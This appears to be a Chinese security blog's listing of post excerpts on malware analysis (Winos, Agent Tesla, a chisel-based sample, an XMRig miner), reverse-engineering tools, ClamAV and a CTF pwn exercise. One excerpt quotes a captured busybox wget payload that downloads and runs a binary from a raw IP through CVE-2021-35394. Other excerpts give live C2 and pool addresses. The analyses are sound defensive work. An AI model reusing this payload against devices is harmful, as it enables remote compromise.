来源：不只是黑产？疑似筹划 APT 攻击的”银狐”团伙攻击活动分析 12MD5：7468dd569c6c4087426012c9bb1b1227 Winos 41d9f4201c9090f2009727664431e80d Winos 样本执行流程图如下 两个样本功能一致，以第二个文件为例 显示加壳vmp2，但实际虽然存在vmp反调试的保护，但是未发现对代码段进行加密。 脱壳后发现第一层功

窃密木马家族 Agent Tesla 编译语言 .NET 首次发现时间 2014年 针对平台 Windows 主要传播方式 网络钓鱼 主要分析对抗技术 载荷混淆、多层载荷加载、进程注入 主要窃取目标 系统数据、浏览器、电子邮件、FTP、VPN、远程连接工具、即时通讯软件、数据库、下载器 其他恶意行为 禁用系统功能、持久化 样本情况12345文件名: SOA

介绍IDAPython是IDA Pro内置的一个强大工具，可以自动化处理繁琐的逆向工程任务。 IDAPython和IDC同样都是利用IDA Pro的api进行自动化操作的工具，其中IDAPython基于Python，而IDC是基于C的。 IDAPython在2004年被开发出来，其目的是取代IDA自带的idc脚本引擎，提供更强大的扩展能力和自动化分析能力。 IDAPython由三个独立的模块组

背景设备报警 1orf;cd /tmp; rm -rf mpsl; /bin/busybox wget http://78.40.117.227/rebirth.mpsl; chmod +x rebirth.mpsl; ./rebirth.mpsl; rm -rf rebirth.mpsl 通过playload可以看出利用了Realtek SDK远程命令执行漏洞（CVE-2021-35394）

样本基本信息 64位控制台程序，由go语言编写 MD5: DB1F693F4C88E46545BFB7A2157B25AA 样本分析虚拟机运行后请求IP 139.99.71.234 运行出现明显的运行提示，IDA反编译发现有明显的参数特征，尝试添加参数运行失败，根据初步怀疑是开源工具修改 根据字符串可以定位到chisel内网穿透工具 https://github.com/jpillora/c

背景2024.2.3 看雪社区成员发表文章 [讨论]火绒5.0.68.0残忍杀害本机explorer.exe 2024.2.18 火绒安全论坛官方发表公告 [产品公告] 关于近期explorer误报问题说明 当然还有B站 = = 从上述文章可以看出，火绒在 2024年1月12日 之前的旧版本，在windows10 22h2更新补丁（KB5034203、KB5034763等

官网 https://www.clamav.net/ 官方文档 https://docs.clamav.net/ Ubuntu在线安装123sudo apt-get install clamav或者 sudo apt-get install clamtk #图形化界面，感觉不如命令行直观sudo clamscan --exclude-dir=/sys/ -i -r / 12345678

$77_oracle.exe样本基本信息 可以看出样本为64位PE文件，使用C++语言，编译器为VS2019。文件MD5：3b89f9f1e9932eee5a031b0266894f5f 样本分析版本信息显示为 XMRig/6.15.2 MSVC/2019，矿池地址为5.133.65.54:80 原版XMRig https://github.com/xmrig/xmr

恶意文件基本情况如下： 文件为搜索连接器文件 (.searchConnector-ms)，官方文档： https://learn.microsoft.com/zh-cn/windows/win32/search/search-sconn-desc-schema-entry#what-are-search-connectors 可以看出攻击者针对的是win10以上系统用户 文件会通过Windo

bjdctf_2020_babystack2栈迁移利用printf获取上个栈帧的ebp：printf遇到 \x00 就会截断，如果我们输入的内容正好把ebp前面的区域完全覆盖，就可以带出ebp。 上个栈帧的ebp(0xffffdo58)到输入s(0xffffd020)的距离是0x38。 1234567891011121314151617from pwn import *context(os =